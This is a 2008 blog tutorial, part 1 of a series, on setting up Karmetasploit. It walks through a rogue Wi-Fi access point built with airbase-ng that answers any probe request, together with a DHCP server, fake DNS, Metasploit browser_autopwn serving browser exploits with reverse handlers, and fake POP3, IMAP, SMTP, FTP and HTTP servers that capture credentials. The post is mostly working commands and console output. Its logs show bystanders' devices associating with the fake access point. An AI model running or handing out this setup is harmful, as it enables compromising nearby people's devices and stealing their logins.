Thursday, August 14, 2008

Metasploit + Karma=Karmetasploit Part 1


HD Moore released some documentation to get karmetasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...

19:55:44 Injection is working!

19:55:46 Found 5 APs


19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'

19:55:52 0/30: 0%


19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%


19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80

19:56:03 5/30: 16%


19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'

19:56:09 0/30: 0%


19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%


Look's like we are good.

Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up its pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...


airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that we run our karma.rc file within using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc



=[ msf v3.2-release

+ -- --=[ 304 exploits - 124 payloads

+ -- --=[ 18 encoders - 6 nops

=[ 79 aux


resource> load db_sqlite3

[*] Successfully loaded plugin: db_sqlite3

resource> db_create /root/karma.db

[*] The specified database already exists, connecting

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST 172.16.1.207

AUTOPWN_HOST => 172.16.1.207

resource> setg AUTOPWN_PORT 55550

AUTOPWN_PORT => 55550

resource> setg AUTOPWN_URI /ads

AUTOPWN_URI => /ads

resource> set LHOST 172.16.1.207

LHOST => 172.16.1.207

resource> set LPORT 45000

LPORT => 45000

resource> set SRVPORT 55550

SRVPORT => 55550

resource> set URIPATH /ads

URIPATH => /ads

resource> run

[*] Starting exploit modules on host 172.16.1.207...

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core

[*] Server started.

[*] Started reverse handler

[*] Server started.

[*] Using URL: http://0.0.0.0:55550/ads

[*] Local IP: http://127.0.0.1:55550/ads

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 110

SRVPORT => 110

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 995

SRVPORT => 995

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/ftp

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL false

SSL => false

resource> set SRVPORT 143

SRVPORT => 143

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL true

SSL => true

resource> set SRVPORT 993

SRVPORT => 993

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL false

SSL => false

resource> set SRVPORT 25

SRVPORT => 25

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL true

SSL => true

resource> set SRVPORT 465

SRVPORT => 465

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 5353

SRVPORT => 5353

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 53

SRVPORT => 53

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 80

SRVPORT => 80

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8080

SRVPORT => 8080

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 443

SRVPORT => 443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8443

SRVPORT => 8443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

msf auxiliary(http) >


Next post we'll see karmetasploit in action.
CG

2 comments:

Anonymous said...

Nice write up. Have you used this in a pentest yet?

btw, nice hanging with you at Defcon...probably see you at another con in the near future.

CG said...

not yet, we usually have separate wifi dudes on the road with us.

and likewise tom!